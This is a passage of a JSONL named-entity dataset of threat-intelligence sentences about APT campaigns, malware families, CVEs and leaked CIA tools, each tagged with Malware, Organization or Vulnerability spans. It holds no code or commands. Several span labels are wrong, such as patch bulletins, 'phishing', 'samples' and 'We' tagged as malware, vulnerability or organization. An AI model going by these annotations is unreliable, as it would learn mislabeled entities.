"source": "dnrti_valid"}} {"text": "To do this , the actor may have used a unique tool called Atmosphere , a Trojan developed by Silence to remotely control ATM dispensers , or a similar program called xfs-disp.exe , which the actor may have used in their attack on IT Bank .", "spans": {"Malware: xfs-disp.exe": [[166, 178]]}, "info": {"id": "dnrti_valid_000469", "source": "dnrti_valid"}} {"text": "The main goal of Silence.Downloader is to receive an executable file and run it on an infected machine .", "spans": {"Malware: Silence.Downloader": [[17, 35]]}, "info": {"id": "dnrti_valid_000470", "source": "dnrti_valid"}} {"text": "Silence.MainModule is a typical remote control Trojan that provides access to the command shell CMD.EXE with the possibility of downloading files from remote nodes to a computer and uploading files from a computer to a remote server .", "spans": {"Malware: Silence.MainModule": [[0, 18]]}, "info": {"id": "dnrti_valid_000471", "source": "dnrti_valid"}} {"text": "Rapid7 again observed APT10 dropping payloads named ccSEUPDT.exe .", "spans": {"Organization: Rapid7": [[0, 6]], "Malware: ccSEUPDT.exe": [[52, 64]]}, "info": {"id": "dnrti_valid_000472", "source": "dnrti_valid"}} {"text": "These malware families have a rich history of being used in many targeted attacks against government and private organizations .", "spans": {"Malware: malware": [[6, 13]]}, "info": {"id": "dnrti_valid_000473", "source": "dnrti_valid"}} {"text": "The samples we analyzed originated from the Philippines .", "spans": {"Malware: samples": [[4, 11]]}, "info": {"id": "dnrti_valid_000474", "source": "dnrti_valid"}} {"text": "Also , the certificate embedded in the Quasar sample was issued at 22.12.2018 , which correlates with the file’s compilation date .", "spans": {"Malware: sample": [[46, 52]]}, "info": {"id": "dnrti_valid_000475", "source": "dnrti_valid"}} {"text": "PlugX is a modular structured malware that has many different operational plugins such as communication 
compression and encryption , network enumeration , files interaction , remote shell operations and more .", "spans": {"Malware: PlugX": [[0, 5]]}, "info": {"id": "dnrti_valid_000476", "source": "dnrti_valid"}} {"text": "TONEDEAF supports collecting system information , uploading and downloading of files , and arbitrary shell command execution .", "spans": {"Malware: TONEDEAF": [[0, 8]]}, "info": {"id": "dnrti_valid_000477", "source": "dnrti_valid"}} {"text": "Of note , FireEye discovered two additional new malware families hosted at this domain , VALUEVAULT and LONGWATCH .", "spans": {"Organization: FireEye": [[10, 17]], "Malware: VALUEVAULT": [[89, 99]], "Malware: LONGWATCH": [[104, 113]]}, "info": {"id": "dnrti_valid_000478", "source": "dnrti_valid"}} {"text": "PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome , Firefox , and Internet Explorer to a file .", "spans": {"Malware: PICKPOCKET": [[0, 10]]}, "info": {"id": "dnrti_valid_000479", "source": "dnrti_valid"}} {"text": "FireEye detects this activity across our platforms , including named detection for TONEDEAF , VALUEVAULT , and LONGWATCH .", "spans": {"Organization: FireEye": [[0, 7]], "Malware: TONEDEAF": [[83, 91]], "Malware: VALUEVAULT": [[94, 104]], "Malware: LONGWATCH": [[111, 120]]}, "info": {"id": "dnrti_valid_000480", "source": "dnrti_valid"}} {"text": "Banks in countries such as Russia , the United Kingdom , the Netherlands , Spain , Romania , Belarus , Poland , Estonia , Bulgaria , Georgia , Moldova , Kyrgyzstan , Armenia , Taiwan and Malaysia have allegedly been targeted with spearphishing emails , luring victims into clicking malicious URLs and executing booby-trapped documents .", "spans": {"Malware: spearphishing emails": [[230, 250]]}, "info": {"id": "dnrti_valid_000481", "source": "dnrti_valid"}} {"text": "The other overlapping files are tools used by the adversary to locate other systems on the network (etool.exe) , check to see if they are 
vulnerable to CVE-2017-0144 (EternalBlue) patched in MS07-010 (checker1.exe) and pivot to them using remote execution functionality offered by a tool similar to PsExec offered by Impacket (psexec.exe) .", "spans": {"Vulnerability: CVE-2017-0144": [[152, 165]], "Malware: MS07-010": [[191, 199]], "Malware: PsExec": [[299, 305]]}, "info": {"id": "dnrti_valid_000482", "source": "dnrti_valid"}} {"text": "Also , the NCSC advisory mentioned that the actors used a file name stylecss.aspx for their webshell , which is the same filename we saw associated with China Chopper .", "spans": {"Malware: stylecss.aspx": [[68, 81]], "Malware: China Chopper": [[153, 166]]}, "info": {"id": "dnrti_valid_000483", "source": "dnrti_valid"}} {"text": "We will provide an analysis of the HyperBro tool in an upcoming section .", "spans": {"Organization: We": [[0, 2]], "Malware: HyperBro": [[35, 43]]}, "info": {"id": "dnrti_valid_000484", "source": "dnrti_valid"}} {"text": "Figure 9 shows a code comparison between the PYTHON33.dll (right) and inicore_v2.3.30.dll (left) (SHA256: 4d65d371a789aabe1beadcc10b38da1f998cd3ec87d4cc1cfbf0af014b783822) , which was sideloaded to run the SysUpdate tool in a previous Emissary Panda campaign .", "spans": {"Malware: PYTHON33.dll": [[45, 57]], "Malware: inicore_v2.3.30.dll": [[70, 89]]}, "info": {"id": "dnrti_valid_000485", "source": "dnrti_valid"}} {"text": "The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 (EternalBlue) that we saw uploaded to the other errr.aspx webshell .", "spans": {"Vulnerability: CVE-2017-0144": [[132, 145]], "Malware: errr.aspx": [[194, 203]]}, "info": {"id": "dnrti_valid_000486", "source": "dnrti_valid"}} {"text": "We believe the actors pivoted to other systems on the network using stolen credentials and by exploiting the CVE-2017-0144 (EternalBlue) vulnerability patched in MS17-010 .", "spans": {"Vulnerability: CVE-2017-0144": [[109, 
122]], "Malware: MS17-010": [[162, 170]]}, "info": {"id": "dnrti_valid_000487", "source": "dnrti_valid"}} {"text": "The first module downloaded by the GRIFFON malware to the victim’s computer is an information-gathering JScript , which allows the cybercriminals to understand the context of the infected workstation .", "spans": {"Malware: GRIFFON": [[35, 42]]}, "info": {"id": "dnrti_valid_000488", "source": "dnrti_valid"}} {"text": "The new GRIFFON implant is written to the hard drive before each execution , limiting the file-less” aspect of this method .", "spans": {"Malware: GRIFFON": [[8, 15]]}, "info": {"id": "dnrti_valid_000489", "source": "dnrti_valid"}} {"text": "In fact , AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers , email clients , messengers , etc , and can act as a keylogger .", "spans": {"Malware: AveMaria": [[10, 18]]}, "info": {"id": "dnrti_valid_000490", "source": "dnrti_valid"}} {"text": "The main payload is usually Imminent Monitor RAT ; however , at the beginning of 2018 , we also observed the use of LuminosityLink RAT , NetWire RAT , and NjRAT .", "spans": {"Malware: Monitor RAT": [[37, 48]], "Malware: LuminosityLink RAT": [[116, 134]], "Malware: NetWire RAT": [[137, 148]], "Malware: NjRAT": [[155, 160]]}, "info": {"id": "dnrti_valid_000491", "source": "dnrti_valid"}} {"text": "In a case in June 2019 , we also noticed Warzone RAT being used .", "spans": {"Malware: Warzone RAT": [[41, 52]]}, "info": {"id": "dnrti_valid_000492", "source": "dnrti_valid"}} {"text": "Xpert RAT reportedly first appeared in 2011 .", "spans": {"Malware: Xpert RAT": [[0, 9]]}, "info": {"id": "dnrti_valid_000493", "source": "dnrti_valid"}} {"text": "The first version of Proyecto RAT” was published at the end of 2010 .", "spans": {"Malware: Proyecto RAT”": [[21, 34]]}, "info": {"id": "dnrti_valid_000494", "source": "dnrti_valid"}} {"text": "Similar to previous campaigns , the JAR was directly attached 
to emails and used file names such as Order_2018.jar .", "spans": {"Malware: JAR": [[36, 39]]}, "info": {"id": "dnrti_valid_000495", "source": "dnrti_valid"}} {"text": "Code contained inside one of the slides triggers an exploit for CVE-2017-8759 , a remote code execution vulnerability in Microsoft .NET framework .", "spans": {"Malware: slides": [[33, 39]], "Vulnerability: CVE-2017-8759": [[64, 77]]}, "info": {"id": "dnrti_valid_000496", "source": "dnrti_valid"}} {"text": "On June 24 , we found another campaign targeting Lebanon with the ServHelper malware .", "spans": {"Malware: ServHelper": [[66, 76]]}, "info": {"id": "dnrti_valid_000497", "source": "dnrti_valid"}} {"text": "Nonetheless , these spam emails were not delivered to the UAE or Arabic-speaking users , but to banks in Asian countries such as India , Indonesia , and the Philippines .", "spans": {"Malware: spam emails": [[20, 31]]}, "info": {"id": "dnrti_valid_000498", "source": "dnrti_valid"}} {"text": "In April 2019 , several national security organizations released alerts on CVE-2019-0604 exploitation , including the Saudi Arabian National Cyber Security Center and the Canadian Center for Cyber Security .", "spans": {"Vulnerability: CVE-2019-0604": [[75, 88]], "Organization: Cyber Security Center": [[141, 162]], "Organization: Canadian Center": [[171, 186]]}, "info": {"id": "dnrti_valid_000499", "source": "dnrti_valid"}} {"text": "Both of these alerts discussed campaigns in which actors used the CVE-2019-0604 to exploit SharePoint servers to install the China Chopper webshell .", "spans": {"Vulnerability: CVE-2019-0604": [[66, 79]]}, "info": {"id": "dnrti_valid_000500", "source": "dnrti_valid"}} {"text": "The Emissary Panda threat group loaded the China Chopper webshell onto SharePoint servers at two Government organizations in the Middle East , which we believe with high confidence involved exploiting a remote code execution vulnerability in SharePoint tracked in CVE-2019-0604 .", "spans": 
{"Vulnerability: CVE-2019-0604": [[264, 277]]}, "info": {"id": "dnrti_valid_000502", "source": "dnrti_valid"}} {"text": "To deliver their malware , the cyber criminals use spearphishing emails with various types of attachments: MS Office documents or spreadsheet files exploiting some known vulnerability like CVE-2017-11882 , or documents with Ole2Link and SCT .", "spans": {"Vulnerability: CVE-2017-11882": [[189, 203]]}, "info": {"id": "dnrti_valid_000505", "source": "dnrti_valid"}} {"text": "This activity ceased in February 2016 , likely because the men who made up Scattered Canary began to focus on honing their BEC skills. total , Scattered Canary received more than 3 , 000 account credentials as a result of their phishing attacks .", "spans": {"Vulnerability: phishing": [[228, 236]]}, "info": {"id": "dnrti_valid_000506", "source": "dnrti_valid"}} {"text": "The past iteration of SLUB spread from a unique watering hole website exploiting CVE-2018-8174 , a VBScript engine vulnerability .", "spans": {"Vulnerability: CVE-2018-8174": [[81, 94]]}, "info": {"id": "dnrti_valid_000507", "source": "dnrti_valid"}} {"text": "This malicious site used CVE-2019-0752 , an Internet Explorer vulnerability discovered by Trend Micro’s Zero Day Initiative (ZDI) that was just patched this April .", "spans": {"Vulnerability: CVE-2019-0752": [[25, 38]], "Organization: Trend Micro’s": [[90, 103]]}, "info": {"id": "dnrti_valid_000508", "source": "dnrti_valid"}} {"text": "The SLUB malware was delivered through watering hole websites that were injected with exploits for CVE-2018-8174 or CVE-2019-0752 .", "spans": {"Vulnerability: CVE-2018-8174": [[99, 112]], "Vulnerability: CVE-2019-0752": [[116, 129]]}, "info": {"id": "dnrti_valid_000509", "source": "dnrti_valid"}} {"text": "In May 2018 , campaigns being conducted by SWEED began leveraging another vulnerability in Microsoft Office: CVE-2017-11882 , a remote code execution bug in Microsoft Office that is commonly observed being leveraged in 
malicious documents used in commodity malware distribution .", "spans": {"Vulnerability: CVE-2017-11882": [[109, 123]]}, "info": {"id": "dnrti_valid_000510", "source": "dnrti_valid"}} {"text": "Zebrocy activity initiates with spearphishing operations delivering various target profilers and downloaders without the use of any 0day exploits .", "spans": {"Vulnerability: 0day exploits": [[132, 145]]}, "info": {"id": "dnrti_valid_000512", "source": "dnrti_valid"}} {"text": "On Nov14 , 2017 , FireEye observed APT34 using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East .", "spans": {"Organization: FireEye": [[18, 25]], "Vulnerability: vulnerability": [[83, 96]], "Organization: government organization": [[109, 132]]}, "info": {"id": "dnrti_valid_000513", "source": "dnrti_valid"}} {"text": "Google and Microsoft have already confirmed the Russian hacker group APT28 used a Flash vulnerability CVE-2016-7855 along with this kernel privilege escalation flaw to perform a targeted attack .", "spans": {"Organization: Google": [[0, 6]], "Organization: Microsoft": [[11, 20]], "Vulnerability: CVE-2016-7855": [[102, 115]]}, "info": {"id": "dnrti_valid_000514", "source": "dnrti_valid"}} {"text": "Kaspersky first became aware of BlackOasis’ activities in May 2016 , while investigating another Adobe Flash zero day .", "spans": {"Organization: Kaspersky": [[0, 9]], "Vulnerability: zero day": [[109, 117]]}, "info": {"id": "dnrti_valid_000515", "source": "dnrti_valid"}} {"text": "This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 .", "spans": {"Malware: Microsoft Word documents": [[64, 88]], "Vulnerability: CVE-2017-0199": [[100, 113]]}, "info": {"id": "dnrti_valid_000525", "source": "dnrti_valid"}} {"text": "Ke3chang has also leveraged a Java zero-day vulnerability ( CVE-2012-4681 ) , as well as older , reliable exploits for Microsoft Word ( CVE-2010-3333 ) and Adobe PDF 
Reader ( CVE-2010-2883 ) .", "spans": {"Vulnerability: Java zero-day vulnerability": [[30, 57]], "Vulnerability: CVE-2012-4681": [[60, 73]], "Malware: Microsoft Word": [[119, 133]], "Vulnerability: CVE-2010-3333": [[136, 149]], "Vulnerability: CVE-2010-2883": [[175, 188]]}, "info": {"id": "dnrti_valid_000526", "source": "dnrti_valid"}} {"text": "Documents with the Flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal .", "spans": {"Malware: Documents": [[0, 9]], "Vulnerability: Flash exploit": [[19, 32]]}, "info": {"id": "dnrti_valid_000527", "source": "dnrti_valid"}} {"text": "Both attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array Remote Code Execution Vulnerability tracked by CVE-2014-6332 .", "spans": {"Malware: malicious Word documents": [[21, 45]], "Vulnerability: Windows OLE Automation Array Remote Code Execution Vulnerability": [[74, 138]], "Vulnerability: CVE-2014-6332": [[150, 163]]}, "info": {"id": "dnrti_valid_000529", "source": "dnrti_valid"}} {"text": "POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 .", "spans": {"Malware: RTF file": [[41, 49]], "Vulnerability: CVE-2017-0199": [[65, 78]]}, "info": {"id": "dnrti_valid_000530", "source": "dnrti_valid"}} {"text": "This bait document , or email attachment , appears to be a standard Word document , but is in fact an CVE-2012-0158 exploit , an executable with a double extension , or an executable with an RTLO filename , so it can execute code without the user 's knowledge or consent .", "spans": {"Malware: bait document": [[5, 18]], "Malware: Word document": [[68, 81]], "Vulnerability: CVE-2012-0158": [[102, 115]]}, "info": {"id": "dnrti_valid_000531", "source": "dnrti_valid"}} {"text": "The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199 .", "spans": {"Malware: .rtf file": [[43, 52]], "Vulnerability: CVE-2017-0199": [[68, 81]]}, "info": {"id": 
"dnrti_valid_000532", "source": "dnrti_valid"}} {"text": "The attackers stole organizations' SSL certificates associated with security appliances such as ASA to obtain VPN credentials , allowing the actors to gain access to the targeted network .", "spans": {}, "info": {"id": "dnrti_valid_000533", "source": "dnrti_valid"}} {"text": "More importantly , one of these files also enables the download of TeamViewer , a remote access tool that gives threat actors remote control over the system .", "spans": {}, "info": {"id": "dnrti_valid_000534", "source": "dnrti_valid"}} {"text": "The agency's hacking division freed it from having to disclose its often controversial operations to the NSA (its primary bureaucratic rival) in order to draw on the NSA's hacking capacities .", "spans": {"Organization: NSA": [[105, 108]]}, "info": {"id": "dnrti_valid_000535", "source": "dnrti_valid"}} {"text": "After infestation , Weeping Angel places the target TV in a 'Fake-Off' mode , so that the owner falsely believes the TV is off when it is on .", "spans": {}, "info": {"id": "dnrti_valid_000536", "source": "dnrti_valid"}} {"text": "The CIA's Mobile Devices Branch (MDB) developed numerous attacks to remotely hack and control popular smart phones .", "spans": {}, "info": {"id": "dnrti_valid_000537", "source": "dnrti_valid"}} {"text": "These techniques permit the CIA to bypass the encryption of WhatsApp , Signal , Telegram , Wiebo , Confide and Cloackman by hacking the smart phones that they run on and collecting audio and message traffic before encryption is applied .", "spans": {}, "info": {"id": "dnrti_valid_000538", "source": "dnrti_valid"}} {"text": "The CIA also runs a very substantial effort to infect and control Microsoft Windows users with its malware .", "spans": {}, "info": {"id": "dnrti_valid_000539", "source": "dnrti_valid"}} {"text": "As an example , specific CIA malware revealed in Year Zero is able to penetrate , infest and control both the Android phone and iPhone software 
that runs or has run presidential Twitter accounts .", "spans": {}, "info": {"id": "dnrti_valid_000540", "source": "dnrti_valid"}} {"text": "we assess with high confidence that these incidents were conducted by APT10 also known as Stone Panda , menuPass , CVNX in an effort to gain access to networks and steal valuable intellectual property or gain commercial advantage .", "spans": {}, "info": {"id": "dnrti_valid_000541", "source": "dnrti_valid"}} {"text": "Utilizing actors working for shell companies such as Huaying Haitai Science and Technology Development Co Ltd , the MSS has conducted an unprecedented campaign , dubbed Operation Cloud Hopper , ” against managed IT service providers (MSPs) designed to steal intellectual property and enable secondary attacks against their clients .", "spans": {}, "info": {"id": "dnrti_valid_000542", "source": "dnrti_valid"}} {"text": "We assess that APT10 likely compromised Visma with the primary goal of enabling secondary intrusions onto their client networks , and not of stealing Visma intellectual property .", "spans": {}, "info": {"id": "dnrti_valid_000543", "source": "dnrti_valid"}} {"text": "In this same time frame , APT10 also targeted a U.S. 
law firm and an international apparel company , likely to gather information for commercial advantage .", "spans": {}, "info": {"id": "dnrti_valid_000544", "source": "dnrti_valid"}} {"text": "Access to the networks of these third-party service providers grants the MSS the ability to potentially access the networks of hundreds , if not thousands , of corporations around the world .", "spans": {}, "info": {"id": "dnrti_valid_000545", "source": "dnrti_valid"}} {"text": "In all three incidents , the attackers gained access to networks through deployments of Citrix and LogMeIn remote-access software using stolen valid user credentials .", "spans": {}, "info": {"id": "dnrti_valid_000546", "source": "dnrti_valid"}} {"text": "In early 2017 , APT10 began conducting attacks against global managed IT service providers (MSPs) that granted them unprecedented access to MSPs and their customers’ networks .", "spans": {"Organization: (MSPs)": [[91, 97]]}, "info": {"id": "dnrti_valid_000547", "source": "dnrti_valid"}} {"text": "This was followed by an initial exploitation , network enumeration , and malicious tool deployment on various Visma endpoints within two weeks of initial access .", "spans": {}, "info": {"id": "dnrti_valid_000548", "source": "dnrti_valid"}} {"text": "They also used WinRAR and cURL for Windows , both often renamed , to compress and upload the exfiltrated files from the Visma network to the Dropbox API .", "spans": {}, "info": {"id": "dnrti_valid_000549", "source": "dnrti_valid"}} {"text": "The attacker gained access to the victim’s internet-accessible Citrix systems and authenticated to them from networks associated with low-cost VPN providers owned by VPN Consumer Network .", "spans": {}, "info": {"id": "dnrti_valid_000550", "source": "dnrti_valid"}} {"text": "The attackers used the same method of lateral movement by mounting the remote drive on a system , copying 1.bat to it , using task scheduler to execute the batch script , and finally , deleting the 
batch script .", "spans": {}, "info": {"id": "dnrti_valid_000551", "source": "dnrti_valid"}} {"text": "APT10's unprecedented campaign against MSPs , alleged to have included some of the largest MSPs in the world , in order to conduct secondary attacks against their clients , grants the Chinese state the ability to potentially access the networks of hundreds (if not thousands) of corporations around the world .", "spans": {"Organization: MSPs": [[39, 43]]}, "info": {"id": "dnrti_valid_000552", "source": "dnrti_valid"}} {"text": "What lied beneath this facade was a well-engineered campaign of phishing attacks designed to steal credentials and spy on the activity of dozens of journalists , human rights defenders , trade unions and labour rights activists , many of whom are seemingly involved in the issue of migrants’ rights in Qatar and Nepal .", "spans": {}, "info": {"id": "dnrti_valid_000554", "source": "dnrti_valid"}} {"text": "It appears that the attackers may have impersonated the identity of a real young woman and stole her pictures to construct the fake profile , along with a professional biography also stolen from yet another person .", "spans": {}, "info": {"id": "dnrti_valid_000555", "source": "dnrti_valid"}} {"text": "In theory , Shun Wang Technologies could have collected a third of China’s population names and contact numbers if not more .", "spans": {}, "info": {"id": "dnrti_valid_000557", "source": "dnrti_valid"}} {"text": "With no clear declaration of usage from Shun Wang , nor proper regulatory supervision , such data could circulate into underground markets for further exploit , ranging from rogue marketing , targeted telephone scams or even friend referral program abuse during November’s Single’s Day and December’s Asian online shopping fest .", "spans": {}, "info": {"id": "dnrti_valid_000558", "source": "dnrti_valid"}} {"text": "In Operation Sheep’s case , Shun Wang likely harvests end user contact lists without application developer 
acknowledgement .", "spans": {}, "info": {"id": "dnrti_valid_000559", "source": "dnrti_valid"}} {"text": "APT41 has executed multiple software supply chain compromises , gaining access to software companies to inject malicious code into legitimate files before distributing updates .", "spans": {}, "info": {"id": "dnrti_valid_000560", "source": "dnrti_valid"}} {"text": "Learning to access video game production environments enabled APT41 to develop the tactics , techniques , and procedures (TTPs) that were later leveraged against software companies to inject malicious code into software updates .", "spans": {}, "info": {"id": "dnrti_valid_000561", "source": "dnrti_valid"}} {"text": "We believe that like other Chinese espionage operators , APT41 has moved toward strategic intelligence collection and establishing access , but away from direct intellectual property theft .", "spans": {}, "info": {"id": "dnrti_valid_000562", "source": "dnrti_valid"}} {"text": "In June 2018 , APT41 sent spear-phishing emails using an invitation lure to join a decentralized gaming platform linked to a cryptocurrency service (Figure 5) that had positioned itself as a medium of exchange for online games and gambling sites .", "spans": {}, "info": {"id": "dnrti_valid_000563", "source": "dnrti_valid"}} {"text": "We suggest that APT41 sought to target in-game currency but found they could not monetize the specific targeted game , so the group resorted to ransomware to attempt to salvage their efforts and profit from the compromise .", "spans": {}, "info": {"id": "dnrti_valid_000564", "source": "dnrti_valid"}} {"text": "In addition to the aforementioned post-exploitation tools , the actors used these webshells to upload legitimate executables that they would use DLL sideloading to run a malicious DLL that has code overlaps with known Emissary Panda attacks .", "spans": {}, "info": {"id": "dnrti_valid_000565", "source": "dnrti_valid"}} {"text": "Due to these changes without a new date string , we 
believe the date codes are used for campaign tracking rather than a Bookworm build identifier .", "spans": {"Malware: date string": [[35, 46]], "Malware: date codes": [[64, 74]]}, "info": {"id": "dnrti_valid_000600", "source": "dnrti_valid"}} {"text": "In addition to built-in functionalities , the operators of Careto can upload additional modules which can perform any malicious task .", "spans": {"Malware: Careto": [[59, 65]]}, "info": {"id": "dnrti_valid_000601", "source": "dnrti_valid"}} {"text": "The CONFUCIUS_B executable is disguised as a PowerPoint presentation , using a Right-To-Left-Override ( RTLO ) trick and a false icon .", "spans": {"Malware: CONFUCIUS_B": [[4, 15]]}, "info": {"id": "dnrti_valid_000602", "source": "dnrti_valid"}} {"text": "The Android version , for instance , can steal SMS messages , accounts , contacts , and files , as well as record audio .", "spans": {"Malware: Android version": [[4, 19]]}, "info": {"id": "dnrti_valid_000603", "source": "dnrti_valid"}} {"text": "If a bot was installed on a network that was of interest to the hacking group , this bot was then used to upload one of the remote access programs .", "spans": {"Malware: bot": [[5, 8]]}, "info": {"id": "dnrti_valid_000604", "source": "dnrti_valid"}} {"text": "This document , written in Vietnamese , appears to be reviewing and discussing best practices for teaching and researching scientific topics .", "spans": {"Malware: document": [[5, 13]]}, "info": {"id": "dnrti_valid_000605", "source": "dnrti_valid"}} {"text": "There is the exploit code and malware used to gain access to systems , the infrastructure that provides command and control to the malware operator , and the human elements – developers who create the malware , operators who deploy it , and analysts who extract value from the stolen information .", "spans": {"Malware: exploit code": [[13, 25]]}, "info": {"id": "dnrti_valid_000606", "source": "dnrti_valid"}} {"text": "This file requires the target to attempt to 
open the .lnk file , which redirects the user to a Windows Scripting Component ( .wsc ) file , hosted on an adversary-controlled microblogging page .", "spans": {"Malware: .lnk file": [[53, 62]]}, "info": {"id": "dnrti_valid_000607", "source": "dnrti_valid"}} {"text": "Upon successful exploitation , the attachment will install the trojan known as NetTraveler using a DLL side-loading attack technique .", "spans": {"Malware: attachment": [[35, 45]], "Malware: DLL side-loading": [[99, 115]]}, "info": {"id": "dnrti_valid_000608", "source": "dnrti_valid"}} {"text": "wuaupdt.exe is a CMD backdoor , which can receive and execute CMD commands sent from C2 .", "spans": {"Malware: wuaupdt.exe": [[0, 11]]}, "info": {"id": "dnrti_valid_000610", "source": "dnrti_valid"}} {"text": "As described in the infection flow , one of the first uses of the AutoHotKey scripts is to upload a screenshot from the compromised PC .", "spans": {"Malware: AutoHotKey scripts": [[66, 84]]}, "info": {"id": "dnrti_valid_000611", "source": "dnrti_valid"}} {"text": "The RAT , however , had a multitude of functionalities (as listed in the table below) such as to download and execute , compress , encrypt , upload , search directories , etc .", "spans": {"Malware: RAT": [[4, 7]]}, "info": {"id": "dnrti_valid_000612", "source": "dnrti_valid"}} {"text": "Bemstour is specifically designed to deliver a variant of the DoublePulsar backdoor .", "spans": {"Malware: Bemstour": [[0, 8]]}, "info": {"id": "dnrti_valid_000613", "source": "dnrti_valid"}} {"text": "DoublePulsar is then used to inject a secondary payload , which runs in memory only .", "spans": {"Malware: DoublePulsar": [[0, 12]]}, "info": {"id": "dnrti_valid_000614", "source": "dnrti_valid"}} {"text": "The detection evasion techniques we observed in the Okrum malware include embedding the malicious payload within a legitimate PNG image , employing several anti-emulation and anti-sandbox tricks , as well as making frequent changes in implementation .", 
"spans": {"Malware: Okrum": [[52, 57]]}, "info": {"id": "dnrti_valid_000615", "source": "dnrti_valid"}} {"text": "The diagram below illustrates how we believe the actors behind the Sea Turtle campaign used DNS hijacking to achieve their end goals .", "spans": {"Malware: Sea Turtle": [[67, 77]]}, "info": {"id": "dnrti_valid_000616", "source": "dnrti_valid"}} {"text": "If the user enables macro to open the xlsm file , it will then drop the legitimate script engine AutoHotkey along with a malicious script file .", "spans": {"Malware: it": [[50, 52]]}, "info": {"id": "dnrti_valid_000617", "source": "dnrti_valid"}} {"text": "Its configuration utilities like Margarita allows the NOC (Network Operation Center) to customize tools based on requirements from 'Fine Dining' questionairies .", "spans": {"Malware: Margarita": [[33, 42]]}, "info": {"id": "dnrti_valid_000618", "source": "dnrti_valid"}} {"text": "Honeycomb toolserver receives exfiltrated information from the implant; an operator can also task the implant to execute jobs on the target computer , so the toolserver acts as a C2 (command and control) server for the implant .", "spans": {"Malware: Honeycomb": [[0, 9]]}, "info": {"id": "dnrti_valid_000619", "source": "dnrti_valid"}} {"text": "UMBRAGE components cover keyloggers , password collection , webcam capture , data destruction , persistence , privilege escalation , stealth , anti-virus (PSP) avoidance and survey techniques .", "spans": {"Malware: UMBRAGE": [[0, 7]]}, "info": {"id": "dnrti_valid_000620", "source": "dnrti_valid"}} {"text": "'Improvise' is a toolset for configuration , post-processing , payload setup and execution vector selection for survey/exfiltration tools supporting all major operating systems like Windows (Bartender) , MacOS (JukeBox) and Linux (DanceFloor) .", "spans": {"Malware: 'Improvise'": [[0, 11]]}, "info": {"id": "dnrti_valid_000621", "source": "dnrti_valid"}} {"text": "This sample , similar to other Trochilus samples , was deployed 
using a DLL sideloading method utilizing three files , uploaded to the same folder on the victim machine as identified in US-CERT advisory TA17-117A last revised on December 20 , 2018 .", "spans": {"Malware: sample": [[5, 11]], "Malware: Trochilus": [[31, 40]]}, "info": {"id": "dnrti_valid_000622", "source": "dnrti_valid"}} {"text": "The configuration file then loads the Trochilus payload into memory by injecting it into a valid system process .", "spans": {"Malware: configuration file": [[4, 22]]}, "info": {"id": "dnrti_valid_000623", "source": "dnrti_valid"}} {"text": "Insikt Group analysis of network metadata to and from the VPN endpoint IPs revealed consistent connectivity to Citrix-hosted infrastructure from all eight VPN endpoint IPs starting on August 17 , 2018 — the same date the first authenticated login to Visma’s network was made using stolen credentials .", "spans": {"Malware: Citrix-hosted": [[111, 124]]}, "info": {"id": "dnrti_valid_000624", "source": "dnrti_valid"}} {"text": "This powerful backdoor can receive commands from the attackers , enabling it to exfiltrate files from the system it is running on , execute additional scripts , delete files , and more .", "spans": {"Malware: backdoor": [[14, 22]]}, "info": {"id": "dnrti_valid_000625", "source": "dnrti_valid"}} {"text": "In addition , by using VBA2Graph , we were able to visualize the VBA call graph in the macros of each document .", "spans": {"Malware: VBA2Graph": [[23, 32]]}, "info": {"id": "dnrti_valid_000626", "source": "dnrti_valid"}} {"text": "The JavaScript forces visiting web browsers to collect and send (via a POST request) web browser , browser version , country of origin , and IP address data to the attacker controlled server jquerycodedownload.live/check.aspx” .", "spans": {"Malware: JavaScript": [[4, 14]]}, "info": {"id": "dnrti_valid_000627", "source": "dnrti_valid"}} {"text": "The group has repeatedly used social media , particularly LinkedIn , to identify and interact with 
employees at targeted organizations , and then used weaponized Excel documents to deliver RATs such as PupyRAT .", "spans": {}, "info": {"id": "dnrti_valid_000628", "source": "dnrti_valid"}} {"text": "CTU researchers conclude that COBALT GYPSY created the persona to gain unauthorized access to targeted computer networks via social engineering .", "spans": {"Organization: CTU": [[0, 3]]}, "info": {"id": "dnrti_valid_000629", "source": "dnrti_valid"}} {"text": "The persistent use of social media to identify and manipulate victims indicates that COBALT GYPSY successfully achieves its objectives using this tactic .", "spans": {}, "info": {"id": "dnrti_valid_000630", "source": "dnrti_valid"}} {"text": "COBALT GYPSY 's continued social media use reinforces the importance of recurring social engineering training .", "spans": {}, "info": {"id": "dnrti_valid_000631", "source": "dnrti_valid"}} {"text": "The report specifies that Magic Hound targeted political , military and defense industry in the US , UK and Israel .", "spans": {}, "info": {"id": "dnrti_valid_000632", "source": "dnrti_valid"}} {"text": "PwC UK and BAE Systems , working closely with industry and government , have uncovered a new , unparalleled campaign which we refer to as Operation Cloud Hopper .", "spans": {"Organization: PwC UK": [[0, 6]], "Organization: BAE Systems": [[11, 22]]}, "info": {"id": "dnrti_valid_000633", "source": "dnrti_valid"}} {"text": "By targeting high-tech and manufacturing operations in Japan and Taiwan , DragonOK may be acquiring trade secrets for a competitive economic advantage .", "spans": {}, "info": {"id": "dnrti_valid_000634", "source": "dnrti_valid"}} {"text": "Targeted sectors of Molerats include governmental and diplomatic institutions , including embassies ; companies from the aerospace and defence industries ; financial institutions ; journalists ; software developers .", "spans": {"Organization: governmental": [[37, 49]], "Organization: embassies": [[90, 99]], 
